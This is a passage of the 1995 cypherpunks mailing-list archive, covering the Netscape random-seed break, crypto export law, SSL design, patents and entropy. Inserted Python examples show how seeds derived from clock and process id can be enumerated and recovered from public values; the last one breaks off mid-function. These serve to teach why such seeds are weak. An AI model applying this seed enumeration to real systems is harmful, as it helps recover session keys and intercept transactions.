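    seeds = tick_seeds(MINUTE_START_S, 60, GRANULARITY_US)
    weak = cookie_from_seed(SERVER_START_US)
    print("cookie length: %d bits" % (len(weak) * 8))
    print("possible seeds in one minute: %d (%.2f bits)" % (len(seeds), effective_bits(seeds)))
    print("seed re-derived from cookie: %s" % (find_seed(weak, seeds) == SERVER_START_US))
```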




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Thu, 21 Sep 95 00:37:26 PDT
To: iang@cs.berkeley.edu
Subject: Export via FTP: who's to blame?  Ask a court!
In-Reply-To: <43qvn4$mm@calum.csclub.uwaterloo.ca>
Message-ID: <9509210737.AA10902@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> (ITAR yadda), but even so, if JRFurriner downloads
> crypto from company C's site in the US, who's guilty of ITAR-violation?
> Company C for making it available, or JRF for initiating the action
> that caused the bits to be sent out of the country?

This is a question that has never been answered by a court.

Personally I think that the Congress can't constitutionally set up a
scheme that restricts US citizens from communicating with each other
to transfer software.  Even if it makes it harder to catch foreigners
who break the law.  Prior restraints on US citizens' communications
can only be done if they are "incidental" to a greater government
purpose.  When their purpose is to restrain the act of communication
itself, they lose.  It's even clear that they can't prevent US
citizens from communicating with foreigners, so the entire crypto
software export regime may be unconstitutional.  The more research we
do on the First Amendment law, the more it looks this way to me.

If some hardy soul wants to set up a nice clean situation, like Phil
Karn did for the paper-vs-magnetic-media distinction, I'm sure we can
find some more pro-bono (zero cost) lawyers who'll take the case for
the fun and notoriety.  You don't have to break the law to get into
court; Phil didn't, for example.  You make a situation where the law
restricts you, then sue to have the restriction declared invalid.  And
if you have ever been in court, it's a lot more fun being the
Plaintiff than being the Defendant.

Doing this will take significant time on your part.  Even if the
lawyers do 95% of the work, you have to talk with them, review what
they write, explain the details in gory detail, and believe in what
they're doing for you.  And sometimes do things in a way that they are
sure is right, even though you yourself aren't sure.  And stick with
the case even though it would drag on for years through several
courts.  So it's not something to do lightly.  But it's worth it.  And
it's a lot safer and easier to enforce your civil rights now, than to
try to live through the civil war that would follow the slide into
authoritarian government.

I'd do this case myself, except that I think we should have few single
points of failure.  If we spread the work around, it's more likely to
happen.  And your civil rights are safer, because you yourself have
learned how to defend them.

	John




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Wed, 20 Sep 95 23:43:44 PDT
To: "'cypherpunks'" <cypherpunks@toad.com>
Subject: Re: Patents and trade secrets
Message-ID: <3061091A@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



>> After a patent is granted, it is usually a good idea to also maintain some
>>trade secrets in your products -- since trade secrets never "expire," unlike
>>patents.  If the patent isn't granted, you still have the option of treating
>>the contents as an intellectual property under trade secret protection.
>
>Rubbish, disclosure is required for a grant of a patent. Unless someone
>skilled in the art can duplicate the invention from the patent claim
>you don't get a patent issued.

Sure disclosure is required.  There is no requirement, however, that an 
invention be your _whole_ product.  For example, most automobiles have 
thousands of patents involved in their creation.  It is entirely possible, 
even commonplace, as I said in my mail, that one or more portions of a 
product represent practice of patented inventions, and one or more _other_ 
portions represent trade secrets.

>Trade secret protection is very tricky in any case. It's practically
>useless if you want to protect a product rather than a procedure.

That depends.  Obviously, trade secret protection can be very effective for 
processes involved in manufacturing physical goods.  In software, it depends 
on whether what you are treating as a secret becomes widely known (after 
which, self-evidently, it is no longer a secret!)  For example, if one were 
to keep the mathematics behind MD5 a trade secret, it is plausible that it 
would never be "figured out" just from examining object code that implements 
the algorithm.  It doesn't matter if it theoretically could be done, just 
that it hasn't actually happened.

dvw




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Weinstein" <jsw@netscape.com>
Date: Thu, 21 Sep 95 01:07:51 PDT
To: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Subject: Re: Please send me SSL problems...
In-Reply-To: <v02110104ac85a804545b@[204.179.132.1]>
Message-ID: <9509210104.ZM154@tofuhut>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 20,  4:35am, "Erik E. Fair"  (Time Keeper) wrote:
> Subject: Re: Please send me SSL problems...

> Jeff, the SSL specification has a severe *architectural* problem - it
> assumes that Internet Protocols are APIs - interface standards, and that
> you can just slide a "layer" underneath without anyone noticing. Such is
> not the case - all the Internet Protocols are real protocol standards, in
> that they specify the syntax, order, and semantics of the actual bits on
> the wire. The IETF quite explicitly doesn't care about APIs - that's a host
> software issue, and it doesn't matter what the host software looks like (or
> even what the machine looks like), so long as it gets the bits on the wire
> right, according to the protocol spec. This is how the Internet can make
> very strong guarantees about interoperability.
>
> You can't fiddle with a communication protocol without getting agreement
> from everyone about the change, or extend it in a way that is compatible
> with the protocol you're modifying, on a per-protocol basis (e.g. adding a
> TELNET negotiation option to TELNET for encryption, an FTP command to FTP,
> etc). Otherwise, all you've done is made a private, non-interoperable
> change to an existing protocol that guarantees interoperability *failures*
> between systems that implement the existing specification, versus your own
> version of HTTP, or TELNET, or whatever. In short, the SSL specification,
> as written, proposes to change all Internet application protocols, globally
> - "slide in a layer." That's not how it's done, and it's not the right
> place to do it, even if it appears to work in an enclave of systems.

  My view of SSL is that it should not generally be considered a transparent
layer that can be plugged in below any application.  I don't consider
HTTP on top of SSL to be the same as HTTP, or something that can totally
replace HTTP.  That's why we use a different port and call it https: and not
http. I think using TELNET and FTP as examples of protocols that can be
transparently layered on top of SSL was unfortunate.  I've looked at
what it takes to make some existing protocols work with SSL, and I'm not
convinced that it's always appropriate.  For example FTP and RCMD use
multiple connections, which is a royal pain.

  It seems that the thing you are objecting to is the wording in the
spec, in the "motivation" section, that appears to suggest that the
entire internet could run on top of SSL.  I think that section of the
spec could just be chopped out, and SSL would still be useful today
without pretensions of world domination.

  If a secure IP standard emerges that is widely deployed and provides
similar services, I don't see why SSL couldn't just go away (this is my
opinion, not an official position of netscape).

  This was sort of off the top of my head.  I've not spent long hours
contemplating these questions...

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Weinstein" <jsw@netscape.com>
Date: Thu, 21 Sep 95 01:22:18 PDT
To: Eric Young <fair@clock.org>
Subject: Re: Please send me SSL problems...
In-Reply-To: <Pine.SOL.3.91.950921150731.23836F-100000@orb>
Message-ID: <9509210118.ZM154@tofuhut>
MIME-Version: 1.0
Content-Type: text/plain


  I don't think that the API that SSLRef exports is not particularly interesting.
We have no attachment to that API.  I would expect someone who gets SSLRef
to rework the API to suit their application.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Thu, 21 Sep 95 00:25:01 PDT
To: jamesd <jamesd@echeque.com>
Subject: Re: Entropy vs Random Bits
Message-ID: <306112E3@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



>Your use of the word random is incorrect:  The throw of a dice is
>random, but only contains 2.6 bits of entropy.

The throw isn't random, the data read from the die after it is thrown is 
random.  The use of the term in many of the postings I have read indicates 
the need for an "unpredictable" quantity in most cases.  This quantity may 
be drawn from a source that has entropy, but it is random.

>> why invent new terms?  Why use them to mean at least two different things?

>This is an old term of the art, a term of information theory:  We use
>the same word because entropy in information theory has the same
>measure as entropy in thermodynamics.
>
>In both cases the entropy, measured in bits, of an ensemble of
>possible states is sum of  - P(i) * lg[P(i)] over all the possible states.

In thermodynamics, counting states in this fashion is a dicey proposition, 
but I appreciate the clarification.  Still, it seems to me that the property 
"bits of entropy" is often substituted for the actual "bits of random data" 
and is just as puzzling as gathering the "entropy of cool steam"!  One can't 
_do_ anything with a dimensionless measurement.  By which I mean, the 
measure of a property of data is not the data itself, so it still seems like 
the usage is odd, at times.  However, your explanation does address some of 
the phrases I have seen.

Does this mean that entropy is conserved in information theory?

dvw
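
Added example, not part of either poster's message: the quoted sum of -P(i) * lg[P(i)] evaluated for a fair die, a loaded die and a set of keystroke intervals, to show the distinction this exchange turns on, namely that the number of bits of data and the number of bits of entropy in that data are different quantities. It goes slightly beyond the thread by also computing min-entropy and by showing that hashing does not add entropy; the loaded-die probabilities and the interval samples are constructed.

```python
import hashlib
import math
from collections import Counter


def shannon_bits(probs):
    """Sum of -P(i) * lg P(i) over all states with nonzero probability, in bits."""
    return -sum(p * math.log2(p) for p in probs if p > 0)


def min_entropy_bits(probs):
    """-lg of the most likely state: the measure that bounds a guesser's first try."""
    return -math.log2(max(probs))


def empirical(samples):
    """Relative frequency of each observed value. Treats samples as independent,
    so the entropy computed from it is an upper bound on the real figure."""
    n = len(samples)
    return [count / n for count in Counter(samples).values()]


FAIR_DIE = [1 / 6] * 6
LOADED_DIE = [0.5, 0.1, 0.1, 0.1, 0.1, 0.1]   # constructed

# Constructed keystroke intervals in milliseconds. Each one is stored in a 16-bit
# field, but only the two low-order bits vary from sample to sample.
INTERVALS_MS = [
    181, 183, 180, 180, 182, 181, 183, 182,
    180, 183, 181, 182, 182, 180, 183, 181,
    183, 180, 182, 181, 180, 182, 181, 183,
    182, 181, 183, 180, 181, 183, 180, 182,
]


def stored_vs_entropy(samples, width_bits=16):
    """(bits of data collected, upper bound on bits of entropy in that data)."""
    per_sample = shannon_bits(empirical(samples))
    return width_bits * len(samples), per_sample * len(samples)


def hashed_die():
    """(output width in bits, entropy in bits) of MD5 applied to one fair die roll.
    A deterministic function maps six inputs to at most six outputs."""
    digests = {hashlib.md5(bytes([face])).digest() for face in range(1, 7)}
    width = len(next(iter(digests))) * 8
    return width, shannon_bits([1 / 6] * len(digests))


if __name__ == "__main__":
    print("fair die:   %.3f bits" % shannon_bits(FAIR_DIE))
    print("loaded die: %.3f bits Shannon, %.3f bits min-entropy"
          % (shannon_bits(LOADED_DIE), min_entropy_bits(LOADED_DIE)))
    print("intervals:  %d bits stored, at most %.1f bits of entropy"
          % stored_vs_entropy(INTERVALS_MS))
    print("MD5(die):   %d-bit output, %.3f bits of entropy" % hashed_die())
```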




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Wed, 20 Sep 95 20:46:12 PDT
To: liberty@gate.net (Jim Ray)
Subject: Re: MIME
In-Reply-To: <199509201253.IAA21521@tequesta.gate.net>
Message-ID: <m0svaN4-000DPeC@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


> >I think that it must be the content-type that is causing problems,
> 
> Yes, I agree. Make it something like ASCII text

But it's not text/plain.  It's PGP'ed text/plain.  The only way to
indicate this in MIME is with a content-type.  (Yes, they're working on
a general way to encapsulate encryption.)

Fine, I'll just leave mail to the list unsigned.
-- 
Shields.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "starrd@iia2.org" <starrd@starrd>
Date: Wed, 20 Sep 95 22:55:31 PDT
To: owner-cypherpunks@toad.com
Subject: Re: your mail
In-Reply-To: <QQzibu08195.199509210130@relay3.UU.NET>
Message-ID: <Pine.BSD.3.91.950921012443.7792C-100000@maxwell.iia2.org>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Sep 1995 owner-cypherpunks@toad.com wrote:
>                                   (    \
> Finger for public key               \   )
> Strong-arm for secret key             /    <--  minor groove
> Thumb-screws for pass-phrase        /   )
> 
> 

I love your phrase, I hope you don't mind...I added it to my .sig.  :)

||||||||||||email address: starrd@iia2.org or starrd@cinenet.net|||||||||||
|    Creator of the original                |         Get paid to upload  |
|      Patriot's Archives                    \     shareware to BBSes and |
| ftp: iia.org /pub/users/patriot              \_____      the Internet!  |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\      Get file:     |
| For index of available files: descript.ion           \  uploader.zip    |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

Finger for PGP public key, strong-arm for secret key, thumbscrews for
passphrase...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Wed, 20 Sep 95 22:32:57 PDT
To: cypherpunks@toad.com
Subject: Re: Cypherpunks Hold a Cracking Party
In-Reply-To: <199509201812.OAA28709@panix.com>
Message-ID: <43qtdn$jbu@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509201812.OAA28709@panix.com>,
Duncan Frissell  <frissell@panix.com> wrote:
>
>"Anyone know any publications interested in an article on the Crack?"
>
<SARCASM>
How many more can there be?  I must have given interviews to a large
percentage of them by now. :-)  Luckily, it's starting to subside.
I actually had almost a whole hour today during which nobody called.
</SARCASM>

Was it like this for Damien?

   - Ian "whose brain melted after Monday's deluge"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Wed, 20 Sep 95 22:36:19 PDT
To: cypherpunks@toad.com
Subject: Re: Munitions shirt (again)
In-Reply-To: <ac85a2df3002100408ee@[205.199.118.202]>
Message-ID: <43qtjt$kch@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <ac85a2df3002100408ee@[205.199.118.202]>,
Timothy C. May <tcmay@got.net> wrote:
>
>Ian did great work on the latest Netscape break, but this is just plain crazy.
>
Just some random thoughts while my brain is goo... :-)

   - Ian "that, and I'm trying to figure out your country's legal system..."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Wed, 20 Sep 95 22:36:42 PDT
To: cypherpunks@toad.com
Subject: What's with the list? (Old mail?!)
Message-ID: <199509210536.BAA17421@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



Anyone else get old c'punks postings remailed to them from August?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Randy Catoe <Randy@mci.net>
Date: Wed, 20 Sep 95 22:38:24 PDT
To: cypherpunks@toad.com
Subject: Re: USA Today on Fear of Credit Cards over Net
Message-ID: <01HVIQUUZ6HU8WX6TO@MAILSRV1.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


At 07:35 PM 9/20/95 -0400, Perry E. Metzger wrote:
>
>Re: The risk of credit cards.
>
>I suppose that indeed there are large risks elsewhere in the credit
>card system. However, I think that the credit card system itself is
>stupid and insecure and ought to be scrapped -- sending around account
>numbers as magic keys to get payment is a stupid move. It's not
>surprising how large credit card fraud is.
>
>One of the great hopes I have for cryptographic technology is its
>ability to lower the incidence of fraud, and thus lower transaction
>costs a lot. Someday, hopefully, everyone will be able to be a credit
>card merchant because you won't have to trust the merchants not to
>steal.
>
>Perry
>
>
I'm told that the revenue lost to fraud in the
credit card industry is around .15 percent of the gross purchase value.

I'm also told that the credit card companies actually face higher costs
from disputes, i.e. when you call them up and busy out a person to 
resolve a question on your bill. 

Randy





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 20 Sep 95 22:43:20 PDT
To: cypherpunks@toad.com
Subject: Re: Please send me SSL problems...
In-Reply-To: <9509201715.AA19393@sulphur.osf.org>
Message-ID: <9509210543.AA02352@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain


Rich Salz <rsalz@osf.org> writes

>I've heard that Digital, HP, and IBM have all mandated that all security
>code (except keymgmt and other things that are out of scope) must go
>through the GSSAPI:  no writing your own stuff.  I heard, less
>authoritatively, that Microsoft has the same rules, except they use a
>FunnyLookingVariant(far) of an earlier GSSAPI draft.

None of these organisations have mentioned GSSAPI to me.

Do you have a source?


David Van Wie <dvw@hamachi.epr.com> writes

>Many technologies have both patented parts and trade secret parts.  Often, 
>companies will maintain information that is in patent applications as trade 
>secret until they are granted.  I guess I should say _if_ they are granted! 
> After a patent is granted, it is usually a good idea to also maintain some 
>trade secrets in your products -- since trade secrets never "expire," unlike 
>patents.  If the patent isn't granted, you still have the option of treating 
>the contents as an intellectual property under trade secret protection.

Rubbish, disclosure is required for a grant of a patent. Unless someone 
skilled in the art can duplicate the invention from the patent claim
you don't get a patent issued.

Trade secret protection is very tricky in any case. It's practically
useless if you want to protect a product rather than a procedure.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Wed, 20 Sep 95 22:47:57 PDT
To: cypherpunks@toad.com
Subject: Patents and trade secrets was: Encryption algorithms used in PrivaSoft (fwd)
In-Reply-To: <3060D3B3@hamachi>
Message-ID: <43qu9q$nbd@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <3060D3B3@hamachi>, David Van Wie  <dvw@hamachi.epr.com> wrote:
>
>David Clavadetscher of PrivaSoft writes:
>> At this time our crypto engine is patented and proprietary.
>
>Ian Goldberg writes:
>> Waitasec...  I was under the impression that if you patented it, you had to
>> reveal it.  That's why RC4 isn't patented (it used to be a trade secret).
>
>Many technologies have both patented parts and trade secret parts.  Often, 
>companies will maintain information that is in patent applications as trade 
>secret until they are granted.  I guess I should say _if_ they are granted! 

But don't they have to put something on the patent application?  Can they
claim trade secret status for something that was on a patent application,
but rejected?  That seems like they're getting it both ways.  They should
probably have to choose whether or not they want to show anyone their
"secret".  If not, it stays a trade secret.  If so, it's not a secret anymore,
and they hope it's "nonobvious, etc." enough to be granted a patent.

   - Ian "I heard that 'x*y=[(x+y)/2]^2 - [(x-y)/2]^2' is a patented way
		   to multiply numbers of the same parity.  Can anyone verify this
		   and/or produce a reference?"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 20 Sep 95 23:02:49 PDT
To: cypherpunks@toad.com
Subject: Re: Euro-Clipper
In-Reply-To: <199509210102.SAA15389@cory.EECS.Berkeley.EDU>
Message-ID: <9509210602.AA02445@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



> It relates that the policy was approved on the 8th September at
> Strasbourg by the Council, and coincides with an attempt by the
> European Commission to propose a pan-European encryption standard. The
> Council - unlike the Commission - has no statutory powers to enforce
> its recommendations. However, Peter Csonka, the chairman of the
> committee that drafted the document (and an administrative officer at
> the Council's division of crime problems) says that `it is rare for
> countries to reject Council of Europe recommendations'.

It may be rare for a council of Europe recommendation to be rejected
but that is because they can be ignored. Actually the Dutch have
completely ignored the edicts concerning Drugs, the British routinely
ignore anything they don't like in the EU where there is a 
parliamentary element. Don't expect them to snap to attention 
at the council of Europe.

Until there is a law actually passed in the UK there is no 
change in the status quo, same for the other european countries.

> I for one will be making clear to my MP that his stand on this issue
> will determine how I cast my ballot at the next election.

So you would rather have a Tory government plus a promise to permit
crypto than a Labour government plus a promise to repeal the 
criminal justice act? Be real, even the freedom issue alone there
are other factors to weigh in the balance. Plus any Tory promise
would have to be considered as trustworthy as their line at the
last election on taxes.

I can possibly see a choice between LibDem and Labour on this 
issue alone, I don't think that many people will consider it
the major issue at the next election though.

On the other hand you might be able to influence a person
looking to become a candidate in a constituency. One vote
on a selection committee can make a big difference. 

In other words if you want to make cryptography an issue you
will have to hack it at the party level.


	Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Wed, 20 Sep 95 23:03:56 PDT
To: cypherpunks@toad.com
Subject: [NOISE] "hacker" was: first virtual "security"
In-Reply-To: <v02120d1aac85dff6bc68@[199.0.65.105]>
Message-ID: <43qv7h$qog@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <0kMA2EqMc50eMEb4Yx@nsb.fv.com>,
Nathaniel Borenstein  <nsb@nsb.fv.com> wrote:
>If an SSL-like scheme were in wide use world-wide, the hacker who just
>made a name for himself by breaking SSL could instead have gone down in

Ugh.  That word again.  I'm only 22, but I'm old enough to remember
when there were people called "crackers", and being called a "hacker"
was a _good_ thing.

I know at least one article about the break went, "Two hackers in
Berkeley, California...".

We actually got questions from reporters asking why we didn't just use
our newly-found hole to snoop financial transactions.  I've done a lot
of root-breaking in my (short) time, but I work for the Good Guys (TM).

  - Ian "hey, I warned you it was noise"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Wed, 20 Sep 95 23:12:00 PDT
To: cypherpunks@toad.com
Subject: Re: FROM A FRIEND . . .
In-Reply-To: <199509201648.MAA14624@panix.com>
Message-ID: <43qvn4$mm@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <43qrhf$gd5@tera.mcom.com>,
Jeff Weinstein <jsw@neon.netscape.com> wrote:
>  I think that the general opinion of engineers and management here at
>Netscape is that it would be A Really Good Thing to have our US-only
>128+ bit version of Netscape Navigator available for download by US
>citizens and others who are not legally prohibited from using it.

Who _is_ legally prohibited from using it?  I think there are some countries
where the very use of crypto is illegal (could someone please list them?),
but who else?

There are some people that may be legally prohibited from _obtaining_ it
from a US site (ITAR yadda), but even so, if JRFurriner downloads
crypto from company C's site in the US, who's guilty of ITAR-violation?
Company C for making it available, or JRF for initiating the action
that caused the bits to be sent out of the country?

   - Ian "my, I seem to be posting a lot tonight"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: damion.furi@the-matrix.com (DAMION FURI)
Date: Thu, 21 Sep 95 01:45:49 PDT
To: cypherpunks@toad.com
Subject: What's with the list? (Ol
In-Reply-To: <8B18060.00050528DF.uuout@the-matrix.com>
Message-ID: <8B180AF.000505293A.uuout@the-matrix.com>
MIME-Version: 1.0
Content-Type: text/plain



DM|Anyone else get old c'punks postings remailed to them from August?

        Yup.  Blech.

   
        furi@the-matrix.com    pgp-public-key@demon.co.uk    C1225CE1
  RADical 1 Systems - Multi-Platform Custom Programming, Service, & Support






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Wed, 20 Sep 95 20:48:42 PDT
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: Re: first virtual "security" (!!) (was Re: Security Flaw Is Discovered In Software Used in Shopping)
In-Reply-To: <v02120d1aac85dff6bc68@[199.0.65.105]>
Message-ID: <9509210232.AA09480@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain



You have excellent points in your detailed answer, thank you, but

If FV was as used as SSL could be, what prevents, to use your terms,
someone to get MILLIONS of FV's identifiers and use each one only
once, etc ... (imo your figures about SSL and crypto softs risks are
over evaluated, so I over evaluate the 'risks' of yours using same
assumptions)

There can't be more security by transferring data on the clear
compared to an encrypted one... except maybe that people using
encryption can often feel overconfident. So, as someone pointed out,
it is not that much a problem about CC# which are available easily
anyway, but in fact, using encrypted communications is the only way to
ensure (some) *privacy*, in addition to being a security improvement. A
problem is to avoid to fail on "customer expectation", especially when
you've created it. So probably there was too much focus and
advertising on security issues on the internet, by the very same
companies that prove later to fail, giving wrong expectation. Privacy
remains a goal anyway, and financial insecurity never was a problem as
long as it remains under a small %.

So I'd prefer to use crappy netscape 1.1 40 bits export SSL than your
system... Though what I'd really use is PGP :-)

Anyway, if you have happy customers, good for you... I'd suggest that
you'd use "Security through Clarity" as motto ;-)

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

fissionable SEAL Team 6 Kaser Sose nuclear Clinton domestic
disruption DST





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Wed, 20 Sep 95 20:48:09 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: netscape bug
In-Reply-To: <199509201855.LAA17261@netcom16.netcom.com>
Message-ID: <9509210259.AA09589@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Vladimir Z. Nuri writes:
[... some good points and other less good (imo) deleted ...]

[.... netscape is good for us stuff ....]
 > Netscape is a world class product, and it's *free*. on this cypherpunks
 > list, I have seen no end to the venomous criticisms that people level at
 > *free* products, which IMHO is quite tasteless at times. 

FYI Netscape IS NOT FREE, at all. re-read the Licence that you shall
read before clicking <Ok>. (though it is not a problem in itself (helas
ppl must work for a living and sell stuff), apart from the unsecurity
through obscurity which is often a result of commercial products)

[.... netscape is good for us stuff ....]
 > it reminds me of how much people here rant at Microsoft when 
 > virtually no other company on the planet could pull off what they make
 > look easy (ah, that's another story I've filled up other posts with).

Duh ... I wouldn't have insulted Netscape by quoting Micro$oft in the
same post ;-) (half joking)

[.... netscape is good for us stuff ....]

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Qaddafi hack fissionable munitions terrorist Saddam Hussein Clinton





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Wed, 20 Sep 95 22:01:21 PDT
To: cypherpunks@toad.com
Subject: Re: FROM A FRIEND . . .
In-Reply-To: <199509201648.MAA14624@panix.com>
Message-ID: <43qrhf$gd5@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509201648.MAA14624@panix.com>, frissell@panix.com (Duncan Frissell) writes:
> >Updating Customers:
> >Netscape will provide the fix for Export (40 bit) versions of Netscape
> >Navigator later this week for downloading by customers on the Internet.
> >Similarly, the
> >Commerce Server patch for Export versions (40 bit) will be made available
> >from our home page. Because downloading of 128 bit versions of the software
> >is still not permitted by U.S. law, U.S. customers of Netscape Navigator,
> >Netscape Navigator Personal Edition and Netscape Commerce Server using 128
> >bit versions can request the replacement from Netscape for delivery through
> >the regular mail.
> 
> Funny, MIT and MPJ and others manage to enable the downloading of
> export-controlled software.  Also, wasn't there some sort of promise by
> Netscape after we broke the 40-bit version to make the 128-bit version
> available to US users under the Beta/freeware system?  What happened to that
> plan?

  We are also examining some sort of binary patch technology, so that
folks with the US-only version can easily download and apply the patch.

  I think that the general opinion of engineers and management here at
Netscape is that it would be A Really Good Thing to have our US-only
128+ bit version of Netscape Navigator available for download by US
citizens and others who are not legally prohibited from using it.

  As a matter of fact, up until the RNG thing hit on sunday night, I
had been making myself a major pain in the ass to netscape managers
and executives, bugging them every day for at least the past several
weeks, to get a decision about making the US version available for
free download.

  I know that MIT, RSA, and others make crypto code available for
download with various mechanisms.  I'm sure that these institutions
did not make the decision lightly.  This issue is now a very high
priority for our lawyers, but it will take some time for them to
reach a legal opinion about Netscape's legal exposure.  The fact that
MIT and RSA have done it does not mean that the government will not
go after Netscape for similar behavior.  We all know what a juicy
target Netscape is these days...  :-)

  We have submitted our proposal for download checking to the State Dept.
I think that our process does more validation than what others have done.
The State Dept. has so far refused to send us any kind of written approval
of our proposed methods.  I know that many of you think that this is
futile, and I won't dispute that, but I think we do have to make the
effort in order for our case to hold up later.

  We do share your frustration at being forced to use weak crypto.
This has been a major pain for us, but I believe that we are committed
to continuing to produce a version with strong crypto (as long as it
remains legal - sigh).

  I for one will always fight to ensure that we have a version of
our Navigator that supports "strong" crypto, and to make that version
easily and widely available.  The government's attempts to get
companies to produce watered down versions for the US because it is
easier will not succeed here as long as I have any say in the matter.
Also, the company has taken a vocal public position against the
current ITAR restrictions and any sort of mandatory or government
controlled key escrow.

  We are working on it.  Please try to be patient.  It is just as hard
for us as it is for you...

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MIGUELDIAZ@megaweb.com (Miguel Diaz)
Date: Thu, 21 Sep 95 03:46:42 PDT
To: cypherpunks@toad.com
Subject: Seeds which depend on machine states
Message-ID: <199509211044.GAA25896@mail-e1a.megaweb.com>
MIME-Version: 1.0
Content-Type: text/plain


It is my suspicion that seeds which depend on machine
states (i.e. state of your computer at a specific instance of
time) would always be subject to scrutiny and de-cryption.
As long as the software used to encrypt is not self-modifying,
the machine state can (through careful manipulation involving
temperature, clocks, processes etc) always be replicated and
fixed to an acceptable degree.
This allows you to look into the heart of the encryption
method and then create a plan to decode based on a brute-force
attack.  Time is the only friend then of the encryptor and
unfortunately in the case of credit cards this typically is
measured in years. Plenty of time for brute force attacks to
yield fruit.  I'll be gone for two days. Will respond to any
comments Saturday.
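
An added example, not part of the original post: a constructed seed built only from clock and process-id values, showing that its strength is bounded by the number of machine states an observer must try rather than by the hash width, next to a seed drawn from the OS random source. The seed layout, the value ranges, the sample state and all function names are assumptions made for illustration.

```python
import hashlib
import math
import secrets


def machine_state_seed(sec: int, tick: int, pid: int) -> bytes:
    """Constructed weak design: seed = MD5 of clock second, clock tick and process id."""
    return hashlib.md5(f"{sec}:{tick}:{pid}".encode()).digest()


def derive(seed: bytes, label: bytes) -> bytes:
    """Toy expansion of the seed into labelled outputs (public nonce, secret key)."""
    return hashlib.md5(label + seed).digest()


def seed_entropy_bits(sec_window: int, ticks_per_sec: int, pid_count: int) -> float:
    """Upper bound on seed entropy: log2 of the machine states left to try."""
    return math.log2(sec_window * ticks_per_sec * pid_count)


def recover_state(nonce: bytes, secs, ticks, pids):
    """Walk every candidate state; return (state, tries), state is None if absent."""
    tries = 0
    for sec in secs:
        for pid in pids:
            for tick in ticks:
                tries += 1
                if derive(machine_state_seed(sec, tick, pid), b"nonce") == nonce:
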